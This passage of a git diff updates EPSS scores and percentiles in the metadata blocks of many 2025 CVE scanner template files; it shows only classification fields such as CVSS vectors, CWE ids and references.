a/http/cves/2025/CVE-2025-11749.yaml b/http/cves/2025/CVE-2025-11749.yaml index 23b70e062e8..b3c135abaa3 100644 --- a/http/cves/2025/CVE-2025-11749.yaml +++ b/http/cves/2025/CVE-2025-11749.yaml @@ -17,8 +17,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2025-11749 - epss-score: 0.85162 - epss-percentile: 0.99324 + epss-score: 0.86961 + epss-percentile: 0.9941 metadata: max-request: 1 verified: true diff --git a/http/cves/2025/CVE-2025-11833.yaml b/http/cves/2025/CVE-2025-11833.yaml index 0b42a77c3b4..6eba3f949e3 100644 --- a/http/cves/2025/CVE-2025-11833.yaml +++ b/http/cves/2025/CVE-2025-11833.yaml @@ -19,7 +19,7 @@ info: cvss-score: 9.8 cve-id: CVE-2025-11833 epss-score: 0.27274 - epss-percentile: 0.96246 + epss-percentile: 0.96249 cwe-id: CWE-862 cpe: cpe:2.3:a:wpexperts:post_smtp_mailer:*:*:*:*:*:wordpress:*:* metadata: diff --git a/http/cves/2025/CVE-2025-12055.yaml b/http/cves/2025/CVE-2025-12055.yaml index b0087e3dc0b..696bb892433 100644 --- a/http/cves/2025/CVE-2025-12055.yaml +++ b/http/cves/2025/CVE-2025-12055.yaml @@ -18,7 +18,7 @@ info: cvss-score: 7.5 cve-id: CVE-2025-12055 epss-score: 0.4282 - epss-percentile: 0.97368 + epss-percentile: 0.97366 cwe-id: CWE-22 metadata: verified: true diff --git a/http/cves/2025/CVE-2025-12139.yaml b/http/cves/2025/CVE-2025-12139.yaml index 645b376bcd5..69e5464696e 100644 --- a/http/cves/2025/CVE-2025-12139.yaml +++ b/http/cves/2025/CVE-2025-12139.yaml @@ -17,8 +17,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2025-12139 - epss-score: 0.35175 - epss-percentile: 0.96907 + epss-score: 0.27753 + epss-percentile: 0.96299 metadata: verified: true max-request: 1 diff --git a/http/cves/2025/CVE-2025-12480.yaml b/http/cves/2025/CVE-2025-12480.yaml index 5506757e986..9f05558c672 100644 --- a/http/cves/2025/CVE-2025-12480.yaml +++ b/http/cves/2025/CVE-2025-12480.yaml @@ -17,7 +17,7 @@ info: classification: cve-id: CVE-2025-12480 epss-score: 0.74745 - epss-percentile: 0.98816 + epss-percentile: 0.98815 cwe-id: CWE-306 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 diff --git a/http/cves/2025/CVE-2025-1323.yaml b/http/cves/2025/CVE-2025-1323.yaml index 673ec0eb8c9..7a24530d1be 100644 --- a/http/cves/2025/CVE-2025-1323.yaml +++ b/http/cves/2025/CVE-2025-1323.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2025-1323 cwe-id: CWE-89 epss-score: 0.53214 - epss-percentile: 0.97878 + epss-percentile: 0.97874 cpe: cpe:2.3:a:plechevandrey:wp-recall:*:*:*:*:*:wordpress:*:* metadata: vendor: plechevandrey diff --git a/http/cves/2025/CVE-2025-1562.yaml b/http/cves/2025/CVE-2025-1562.yaml index 8ea26fa051e..af9a3f5e5fc 100644 --- a/http/cves/2025/CVE-2025-1562.yaml +++ b/http/cves/2025/CVE-2025-1562.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2025-1562 cwe-id: CWE-862 epss-score: 0.12591 - epss-percentile: 0.93742 + epss-percentile: 0.93738 metadata: verified: true max-request: 3 diff --git a/http/cves/2025/CVE-2025-1743.yaml b/http/cves/2025/CVE-2025-1743.yaml index 1a1caa6d19b..82ee2b40de6 100644 --- a/http/cves/2025/CVE-2025-1743.yaml +++ b/http/cves/2025/CVE-2025-1743.yaml @@ -19,7 +19,7 @@ info: cwe-id: CWE-22 cve-id: CVE-2025-1743 epss-score: 0.04933 - epss-percentile: 0.89315 + epss-percentile: 0.89313 cpe: cpe:2.3:a:zyx0814:pichome:2.1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2025/CVE-2025-1974.yaml b/http/cves/2025/CVE-2025-1974.yaml index 375de4110b9..501d41bdf8e 100644 --- a/http/cves/2025/CVE-2025-1974.yaml +++ b/http/cves/2025/CVE-2025-1974.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2025-1974 cwe-id: CWE-653 - epss-score: 0.91552 - epss-percentile: 0.99653 + epss-score: 0.91843 + epss-percentile: 0.99672 metadata: verified: true max-request: 1 diff --git a/http/cves/2025/CVE-2025-2010.yaml b/http/cves/2025/CVE-2025-2010.yaml index 7ff8d0941a6..c6b7080b28f 100644 --- a/http/cves/2025/CVE-2025-2010.yaml +++ b/http/cves/2025/CVE-2025-2010.yaml @@ -15,7 +15,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2025-2010 classification: epss-score: 0.18963 - epss-percentile: 0.95111 + epss-percentile: 0.9511 cve-id: CVE-2025-2010 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 diff --git a/http/cves/2025/CVE-2025-2011.yaml b/http/cves/2025/CVE-2025-2011.yaml index 614ea3736e2..f3b933e38b8 100644 --- a/http/cves/2025/CVE-2025-2011.yaml +++ b/http/cves/2025/CVE-2025-2011.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2025-2011 cwe-id: CWE-89 epss-score: 0.50355 - epss-percentile: 0.9775 + epss-percentile: 0.97745 metadata: verified: true max-request: 1 diff --git a/http/cves/2025/CVE-2025-20188.yaml b/http/cves/2025/CVE-2025-20188.yaml index 3e445c7f620..aa8a3e40145 100644 --- a/http/cves/2025/CVE-2025-20188.yaml +++ b/http/cves/2025/CVE-2025-20188.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2025-20188 cwe-id: CWE-798 epss-score: 0.02185 - epss-percentile: 0.8394 + epss-percentile: 0.83935 metadata: verified: true max-request: 2 diff --git a/http/cves/2025/CVE-2025-20281.yaml b/http/cves/2025/CVE-2025-20281.yaml index 3885e798f2e..ff6ad33d6bd 100644 --- a/http/cves/2025/CVE-2025-20281.yaml +++ b/http/cves/2025/CVE-2025-20281.yaml @@ -18,8 +18,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2025-20281 - epss-score: 0.26728 - epss-percentile: 0.96184 + epss-score: 0.24038 + epss-percentile: 0.95865 cwe-id: CWE-287 cpe: cpe:2.3:a:cisco:identity_services_engine:*:*:*:*:*:*:*:* metadata: diff --git a/http/cves/2025/CVE-2025-20362.yaml b/http/cves/2025/CVE-2025-20362.yaml index 189ab08550f..c7574baa21b 100644 --- a/http/cves/2025/CVE-2025-20362.yaml +++ b/http/cves/2025/CVE-2025-20362.yaml @@ -17,8 +17,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N cvss-score: 6.5 cve-id: CVE-2025-20362 - epss-score: 0.42189 - epss-percentile: 0.97328 + epss-score: 0.41474 + epss-percentile: 0.97285 cwe-id: CWE-862 cpe: cpe:2.3:o:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:* metadata: diff --git a/http/cves/2025/CVE-2025-2075.yaml b/http/cves/2025/CVE-2025-2075.yaml index cd9454f9ace..24c8f0b9b81 100644 --- a/http/cves/2025/CVE-2025-2075.yaml +++ b/http/cves/2025/CVE-2025-2075.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2025-2075 cwe-id: CWE-862 epss-score: 0.27711 - epss-percentile: 0.96292 + epss-percentile: 0.96295 metadata: verified: true max-request: 4 diff --git a/http/cves/2025/CVE-2025-2127.yaml b/http/cves/2025/CVE-2025-2127.yaml index c5179fd7400..bfec5b0c2d7 100644 --- a/http/cves/2025/CVE-2025-2127.yaml +++ b/http/cves/2025/CVE-2025-2127.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2025-2127 cwe-id: CWE-79 epss-score: 0.00415 - epss-percentile: 0.61117 + epss-percentile: 0.61114 cpe: cpe:2.3:a:joomlaux:jux_real_estate:3.4.0:*:*:*:*:joomla:*:* metadata: vendor: joomlaux diff --git a/http/cves/2025/CVE-2025-2129.yaml b/http/cves/2025/CVE-2025-2129.yaml index 97fd6bf2598..6da0856f7a2 100644 --- a/http/cves/2025/CVE-2025-2129.yaml +++ b/http/cves/2025/CVE-2025-2129.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2025-2129 cwe-id: CWE-1188 epss-score: 0.05384 - epss-percentile: 0.8983 + epss-percentile: 0.89826 metadata: verified: true max-request: 1 diff --git a/http/cves/2025/CVE-2025-2294.yaml b/http/cves/2025/CVE-2025-2294.yaml index 25a073d5fb4..b1d6ce8450a 100644 --- a/http/cves/2025/CVE-2025-2294.yaml +++ b/http/cves/2025/CVE-2025-2294.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2025-2294 cwe-id: CWE-22 epss-score: 0.54347 - epss-percentile: 0.97935 + epss-percentile: 0.97933 metadata: verified: true max-request: 2 diff --git a/http/cves/2025/CVE-2025-23061.yaml b/http/cves/2025/CVE-2025-23061.yaml index ad75cd2fbcc..64c63d2df12 100644 --- a/http/cves/2025/CVE-2025-23061.yaml +++ b/http/cves/2025/CVE-2025-23061.yaml @@ -20,7 +20,7 @@ info: cvss-score: 9.0 cve-id: CVE-2025-23061 epss-score: 0.74239 - epss-percentile: 0.98794 + epss-percentile: 0.98792 cwe-id: CWE-94 cpe: cpe:2.3:a:mongoosejs:mongoose:*:*:*:*:*:node.js:*:* metadata: diff --git a/http/cves/2025/CVE-2025-24016.yaml b/http/cves/2025/CVE-2025-24016.yaml index 48252edf574..73c4dfa0c5c 100644 --- a/http/cves/2025/CVE-2025-24016.yaml +++ b/http/cves/2025/CVE-2025-24016.yaml @@ -15,8 +15,8 @@ info: - https://github.com/wazuh/wazuh/security/advisories/GHSA-hcrc-79hj-m3qh - https://nvd.nist.gov/vuln/detail/CVE-2025-24016 classification: - epss-score: 0.93403 - epss-percentile: 0.99804 + epss-score: 0.93801 + epss-percentile: 0.99851 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H cvss-score: 9.9 cve-id: CVE-2025-24016 diff --git a/http/cves/2025/CVE-2025-24354.yaml b/http/cves/2025/CVE-2025-24354.yaml index 0a19cd9db6e..28bdc2ecb2d 100644 --- a/http/cves/2025/CVE-2025-24354.yaml +++ b/http/cves/2025/CVE-2025-24354.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2025-24354 cwe-id: CWE-918 epss-score: 0.02217 - epss-percentile: 0.8406 + epss-percentile: 0.84056 metadata: verified: true max-request: 1 diff --git a/http/cves/2025/CVE-2025-24514.yaml b/http/cves/2025/CVE-2025-24514.yaml index 5d2fd2d1875..203f4a1f14c 100644 --- a/http/cves/2025/CVE-2025-24514.yaml +++ b/http/cves/2025/CVE-2025-24514.yaml @@ -19,8 +19,8 @@ info: cvss-score: 8.8 cve-id: CVE-2025-24514 cwe-id: CWE-20 - epss-score: 0.44989 - epss-percentile: 0.97477 + epss-score: 0.51515 + epss-percentile: 0.97794 metadata: verified: true max-request: 1 diff --git a/http/cves/2025/CVE-2025-2473.yaml b/http/cves/2025/CVE-2025-2473.yaml index 035e45421ae..a4e608ae3ce 100644 --- a/http/cves/2025/CVE-2025-2473.yaml +++ b/http/cves/2025/CVE-2025-2473.yaml @@ -19,7 +19,7 @@ info: cvss-score: 10 cve-id: CVE-2025-2473 epss-score: 0.08031 - epss-percentile: 0.91858 + epss-percentile: 0.91855 cwe-id: CWE-89 metadata: verified: true diff --git a/http/cves/2025/CVE-2025-24799.yaml b/http/cves/2025/CVE-2025-24799.yaml index 263ae354ea8..c45185a36d2 100644 --- a/http/cves/2025/CVE-2025-24799.yaml +++ b/http/cves/2025/CVE-2025-24799.yaml @@ -16,7 +16,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2025-24799 classification: epss-score: 0.60931 - epss-percentile: 0.98233 + epss-percentile: 0.98232 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2025-24799 diff --git a/http/cves/2025/CVE-2025-24893.yaml b/http/cves/2025/CVE-2025-24893.yaml index 5e853cc1f8a..1bc534ad7f9 100644 --- a/http/cves/2025/CVE-2025-24893.yaml +++ b/http/cves/2025/CVE-2025-24893.yaml @@ -14,8 +14,8 @@ info: - https://github.com/advisories/GHSA-rr6p-3pfg-562j - https://nvd.nist.gov/vuln/detail/CVE-2025-24893 classification: - epss-score: 0.94178 - epss-percentile: 0.99912 + epss-score: 0.94241 + epss-percentile: 0.99923 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2025-24893 diff --git a/http/cves/2025/CVE-2025-24963.yaml b/http/cves/2025/CVE-2025-24963.yaml index a555385ead8..07f52fd608b 100644 --- a/http/cves/2025/CVE-2025-24963.yaml +++ b/http/cves/2025/CVE-2025-24963.yaml @@ -19,7 +19,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2025-24963 classification: epss-score: 0.06086 - epss-percentile: 0.90477 + epss-percentile: 0.90479 cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 5.9 cve-id: CVE-2025-24963 diff --git a/http/cves/2025/CVE-2025-25037.yaml b/http/cves/2025/CVE-2025-25037.yaml index 42f31ea939d..56526f15eb5 100644 --- a/http/cves/2025/CVE-2025-25037.yaml +++ b/http/cves/2025/CVE-2025-25037.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2025-25037 cwe-id: CWE-200 epss-score: 0.01334 - epss-percentile: 0.79558 + epss-percentile: 0.79552 metadata: verified: true max-request: 1 diff --git a/http/cves/2025/CVE-2025-25257.yaml b/http/cves/2025/CVE-2025-25257.yaml index ff2cd06ca63..f55523c621a 100644 --- a/http/cves/2025/CVE-2025-25257.yaml +++ b/http/cves/2025/CVE-2025-25257.yaml @@ -17,8 +17,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2025-25257 - epss-score: 0.64942 - epss-percentile: 0.98407 + epss-score: 0.70447 + epss-percentile: 0.98638 cwe-id: CWE-89 cpe: cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:* metadata: diff --git a/http/cves/2025/CVE-2025-25570.yaml b/http/cves/2025/CVE-2025-25570.yaml index 1a9afbe248b..21e956828ac 100644 --- a/http/cves/2025/CVE-2025-25570.yaml +++ b/http/cves/2025/CVE-2025-25570.yaml @@ -17,8 +17,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2025-25570 - epss-score: 0.47326 - epss-percentile: 0.97595 + epss-score: 0.47476 + epss-percentile: 0.97596 cwe-id: CWE-798 metadata: verified: true diff --git a/http/cves/2025/CVE-2025-2563.yaml b/http/cves/2025/CVE-2025-2563.yaml index 3c4e2f8b037..55099a52b41 100644 --- a/http/cves/2025/CVE-2025-2563.yaml +++ b/http/cves/2025/CVE-2025-2563.yaml @@ -15,8 +15,8 @@ info: - https://patchstack.com/database/wordpress/plugin/user-registration/vulnerability/wordpress-user-registration-membership-plugin-4-1-2-unauthenticated-privilege-escalation-vulnerability - https://nvd.nist.gov/vuln/detail/CVE-2025-2563 classification: - epss-score: 0.83885 - epss-percentile: 0.99269 + epss-score: 0.85926 + epss-percentile: 0.99361 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cwe-id: CWE-269 diff --git a/http/cves/2025/CVE-2025-2610.yaml b/http/cves/2025/CVE-2025-2610.yaml index 60fe9ecf90c..9b068dd4724 100644 --- a/http/cves/2025/CVE-2025-2610.yaml +++ b/http/cves/2025/CVE-2025-2610.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2025-2610 cwe-id: CWE-79 epss-score: 0.02286 - epss-percentile: 0.84289 + epss-percentile: 0.84285 cpe: cpe:2.3:a:magnussolution:magnusbilling:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2025/CVE-2025-26319.yaml b/http/cves/2025/CVE-2025-26319.yaml index 094fa37854d..0d395afe08b 100644 --- a/http/cves/2025/CVE-2025-26319.yaml +++ b/http/cves/2025/CVE-2025-26319.yaml @@ -16,7 +16,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2025-26319 classification: epss-score: 0.78804 - epss-percentile: 0.99004 + epss-percentile: 0.99003 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10.0 cve-id: CVE-2025-26319 diff --git a/http/cves/2025/CVE-2025-2636.yaml b/http/cves/2025/CVE-2025-2636.yaml index 2835967eabd..740aad32d79 100644 --- a/http/cves/2025/CVE-2025-2636.yaml +++ b/http/cves/2025/CVE-2025-2636.yaml @@ -16,7 +16,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2025-2636 classification: epss-score: 0.13543 - epss-percentile: 0.9401 + epss-percentile: 0.94005 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2025-2636 diff --git a/http/cves/2025/CVE-2025-26793.yaml b/http/cves/2025/CVE-2025-26793.yaml index 9f8ba3859f4..98242888706 100644 --- a/http/cves/2025/CVE-2025-26793.yaml +++ b/http/cves/2025/CVE-2025-26793.yaml @@ -16,7 +16,7 @@ info: - https://support.identiv.com/products/physical-access/hirsch/ classification: epss-score: 0.10326 - epss-percentile: 0.92968 + epss-percentile: 0.92961 metadata: verified: true max-request: 1 diff --git a/http/cves/2025/CVE-2025-27007.yaml b/http/cves/2025/CVE-2025-27007.yaml index 3870a2d16fe..ce9498243e2 100644 --- a/http/cves/2025/CVE-2025-27007.yaml +++ b/http/cves/2025/CVE-2025-27007.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2025-27007 cwe-id: CWE-266 epss-score: 0.73907 - epss-percentile: 0.98777 + epss-percentile: 0.98776 metadata: verified: true max-request: 2 diff --git a/http/cves/2025/CVE-2025-2709.yaml b/http/cves/2025/CVE-2025-2709.yaml index f0b9818d41a..6133445664f 100644 --- a/http/cves/2025/CVE-2025-2709.yaml +++ b/http/cves/2025/CVE-2025-2709.yaml @@ -15,7 +15,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2025-2709 classification: epss-score: 0.00061 - epss-percentile: 0.195 + epss-percentile: 0.19452 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2025-2709 diff --git a/http/cves/2025/CVE-2025-2710.yaml b/http/cves/2025/CVE-2025-2710.yaml index e8b28e8d97b..94f6e8614b2 100644 --- a/http/cves/2025/CVE-2025-2710.yaml +++ b/http/cves/2025/CVE-2025-2710.yaml @@ -14,8 +14,8 @@ info: - https://github.com/Hebing123/cve/issues/85 - https://nvd.nist.gov/vuln/detail/CVE-2025-2710 classification: - epss-score: 0.00063 - epss-percentile: 0.20025 + epss-score: 0.00084 + epss-percentile: 0.24822 cve-id: CVE-2025-2710 cwe-id: CWE-79 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N diff --git a/http/cves/2025/CVE-2025-2711.yaml b/http/cves/2025/CVE-2025-2711.yaml index 5754c16c9d4..175ed0a3716 100644 --- a/http/cves/2025/CVE-2025-2711.yaml +++ b/http/cves/2025/CVE-2025-2711.yaml @@ -14,8 +14,8 @@ info: - https://github.com/Hebing123/cve/issues/86 - https://nvd.nist.gov/vuln/detail/CVE-2025-2711 classification: - epss-score: 0.00063 - epss-percentile: 0.20025 + epss-score: 0.00084 + epss-percentile: 0.24822 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2025-2711 diff --git a/http/cves/2025/CVE-2025-27112.yaml b/http/cves/2025/CVE-2025-27112.yaml index bf2744de769..26778c770d7 100644 --- a/http/cves/2025/CVE-2025-27112.yaml +++ b/http/cves/2025/CVE-2025-27112.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2025-27112 cwe-id: CWE-287 epss-score: 0.12881 - epss-percentile: 0.9383 + epss-percentile: 0.93827 cpe: cpe:2.3:a:navidrome:navidrome:*:*:*:*:*:go:*:* metadata: verified: true diff --git a/http/cves/2025/CVE-2025-2712.yaml b/http/cves/2025/CVE-2025-2712.yaml index 4dd677195bf..dff83ee586d 100644 --- a/http/cves/2025/CVE-2025-2712.yaml +++ b/http/cves/2025/CVE-2025-2712.yaml @@ -13,8 +13,8 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2025-2712 classification: - epss-score: 0.00053 - epss-percentile: 0.16941 + epss-score: 0.0007 + epss-percentile: 0.21885 cve-id: CVE-2025-2712 cwe-id: CWE-79 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N diff --git a/http/cves/2025/CVE-2025-27134.yaml b/http/cves/2025/CVE-2025-27134.yaml index 5974a85a75e..dc3205687a5 100644 --- a/http/cves/2025/CVE-2025-27134.yaml +++ b/http/cves/2025/CVE-2025-27134.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2025-27134 cwe-id: CWE-284 epss-score: 0.08061 - epss-percentile: 0.91877 + epss-percentile: 0.91874 cpe: cpe:2.3:a:joplin_project:joplin:*:*:*:*:*:-:*:* metadata: verified: true diff --git a/http/cves/2025/CVE-2025-27218.yaml b/http/cves/2025/CVE-2025-27218.yaml index 51423d3aa81..1ad90cf6ee5 100644 --- a/http/cves/2025/CVE-2025-27218.yaml +++ b/http/cves/2025/CVE-2025-27218.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2025-27218 cwe-id: CWE-94 epss-score: 0.62828 - epss-percentile: 0.98315 + epss-percentile: 0.98316 metadata: verified: true max-request: 1 diff --git a/http/cves/2025/CVE-2025-27225.yaml b/http/cves/2025/CVE-2025-27225.yaml index 09280383cdc..8beefcbde6a 100644 --- a/http/cves/2025/CVE-2025-27225.yaml +++ b/http/cves/2025/CVE-2025-27225.yaml @@ -19,7 +19,7 @@ info: cvss-score: 7.5 cve-id: CVE-2025-27225 epss-score: 0.19548 - epss-percentile: 0.95216 + epss-percentile: 0.95213 cwe-id: CWE-288 metadata: verified: true diff --git a/http/cves/2025/CVE-2025-2748.yaml b/http/cves/2025/CVE-2025-2748.yaml index 3c270309af6..ce6cae47277 100644 --- a/http/cves/2025/CVE-2025-2748.yaml +++ b/http/cves/2025/CVE-2025-2748.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.5 cve-id: CVE-2025-2748 cwe-id: CWE-79 - epss-score: 0.00251 - epss-percentile: 0.48251 + epss-score: 0.00233 + epss-percentile: 0.45857 metadata: verified: true max-request: 2 diff --git a/http/cves/2025/CVE-2025-27505.yaml b/http/cves/2025/CVE-2025-27505.yaml index c33f97e9404..e14d90174ca 100644 --- a/http/cves/2025/CVE-2025-27505.yaml +++ b/http/cves/2025/CVE-2025-27505.yaml @@ -16,7 +16,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2025-27505 classification: epss-score: 0.00408 - epss-percentile: 0.60659 + epss-percentile: 0.60654 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2025-27505 diff --git a/http/cves/2025/CVE-2025-2775.yaml b/http/cves/2025/CVE-2025-2775.yaml index 0483844c097..3fb0de61f3b 100644 --- a/http/cves/2025/CVE-2025-2775.yaml +++ b/http/cves/2025/CVE-2025-2775.yaml @@ -15,7 +15,7 @@ info: - https://documentation.sysaid.com/docs/24-40-60 classification: epss-score: 0.65187 - epss-percentile: 0.98416 + epss-percentile: 0.98418 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L cvss-score: 9.3 cve-id: CVE-2025-2775 diff --git a/http/cves/2025/CVE-2025-2776.yaml b/http/cves/2025/CVE-2025-2776.yaml index cb942d0a7f9..885dbf1bfc8 100644 --- a/http/cves/2025/CVE-2025-2776.yaml +++ b/http/cves/2025/CVE-2025-2776.yaml @@ -15,7 +15,7 @@ info: - https://documentation.sysaid.com/docs/24-40-60 classification: epss-score: 0.50933 - epss-percentile: 0.97771 + epss-percentile: 0.97767 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L cvss-score: 9.3 cve-id: CVE-2025-2776 diff --git a/http/cves/2025/CVE-2025-2777.yaml b/http/cves/2025/CVE-2025-2777.yaml index bbc484785b5..d08f1539db7 100644 --- a/http/cves/2025/CVE-2025-2777.yaml +++ b/http/cves/2025/CVE-2025-2777.yaml @@ -15,7 +15,7 @@ info: - https://documentation.sysaid.com/docs/24-40-60 classification: epss-score: 0.15806 - epss-percentile: 0.94523 + epss-percentile: 0.94522 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L cvss-score: 9.3 cve-id: CVE-2025-2777 diff --git a/http/cves/2025/CVE-2025-27888.yaml b/http/cves/2025/CVE-2025-27888.yaml index ef0d9efe097..77672165133 100644 --- a/http/cves/2025/CVE-2025-27888.yaml +++ b/http/cves/2025/CVE-2025-27888.yaml @@ -15,7 +15,7 @@ info: - http://www.openwall.com/lists/oss-security/2025/03/19/7 classification: epss-score: 0.01448 - epss-percentile: 0.80354 + epss-percentile: 0.80346 metadata: verified: true max-request: 1 diff --git a/http/cves/2025/CVE-2025-27892.yaml b/http/cves/2025/CVE-2025-27892.yaml index 64f706d1f76..42690d81706 100644 --- a/http/cves/2025/CVE-2025-27892.yaml +++ b/http/cves/2025/CVE-2025-27892.yaml @@ -15,7 +15,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2025-27892 classification: epss-score: 0.02119 - epss-percentile: 0.83693 + epss-percentile: 0.83688 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:L cvss-score: 6.8 cve-id: CVE-2025-27892 diff --git a/http/cves/2025/CVE-2025-27915.yaml b/http/cves/2025/CVE-2025-27915.yaml index 3c62f005cd7..5ff1856ec70 100644 --- a/http/cves/2025/CVE-2025-27915.yaml +++ b/http/cves/2025/CVE-2025-27915.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5.4 cve-id: CVE-2025-27915 cwe-id: CWE-79 - epss-score: 0.26521 - epss-percentile: 0.96167 + epss-score: 0.29359 + epss-percentile: 0.96456 metadata: max-request: 1 verified: true diff --git a/http/cves/2025/CVE-2025-28228.yaml b/http/cves/2025/CVE-2025-28228.yaml index 93ecc3e4220..9cdb4c1b7db 100644 --- a/http/cves/2025/CVE-2025-28228.yaml +++ b/http/cves/2025/CVE-2025-28228.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2025-28228 cwe-id: CWE-522 epss-score: 0.04857 - epss-percentile: 0.89236 + epss-percentile: 0.89234 metadata: verified: true max-request: 1 diff --git a/http/cves/2025/CVE-2025-28367.yaml b/http/cves/2025/CVE-2025-28367.yaml index 062d5d56d79..94c527f8222 100644 --- a/http/cves/2025/CVE-2025-28367.yaml +++ b/http/cves/2025/CVE-2025-28367.yaml @@ -16,7 +16,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2025-28367 classification: epss-score: 0.10002 - epss-percentile: 0.92832 + epss-percentile: 0.92825 cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N cvss-score: 6.5 cve-id: CVE-2025-28367 diff --git a/http/cves/2025/CVE-2025-28906.yaml b/http/cves/2025/CVE-2025-28906.yaml index d9fef441088..ee1bd521922 100644 --- a/http/cves/2025/CVE-2025-28906.yaml +++ b/http/cves/2025/CVE-2025-28906.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2025-28906 cwe-id: CWE-79 epss-score: 0.01172 - epss-percentile: 0.78253 + epss-percentile: 0.78248 metadata: verified: true max-request: 5 diff --git a/http/cves/2025/CVE-2025-29927.yaml b/http/cves/2025/CVE-2025-29927.yaml index bbb705c5c22..ca5f653081e 100644 --- a/http/cves/2025/CVE-2025-29927.yaml +++ b/http/cves/2025/CVE-2025-29927.yaml @@ -18,7 +18,7 @@ info: - https://slcyber.io/assetnote-security-research-center/doing-the-due-diligence-analysing-the-next-js-middleware-bypass-cve-2025-29927/ classification: epss-score: 0.92896 - epss-percentile: 0.9976 + epss-percentile: 0.99759 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N cvss-score: 9.1 cwe-id: CWE-287 diff --git a/http/cves/2025/CVE-2025-30406.yaml b/http/cves/2025/CVE-2025-30406.yaml index ec3cb4a5d9a..b383126551c 100644 --- a/http/cves/2025/CVE-2025-30406.yaml +++ b/http/cves/2025/CVE-2025-30406.yaml @@ -15,8 +15,8 @@ info: - https://gladinetsupport.s3.us-east-1.amazonaws.com/gladinet/securityadvisory-cve-2005.pdf - https://www.centrestack.com/p/gce_latest_release.html classification: - epss-score: 0.86805 - 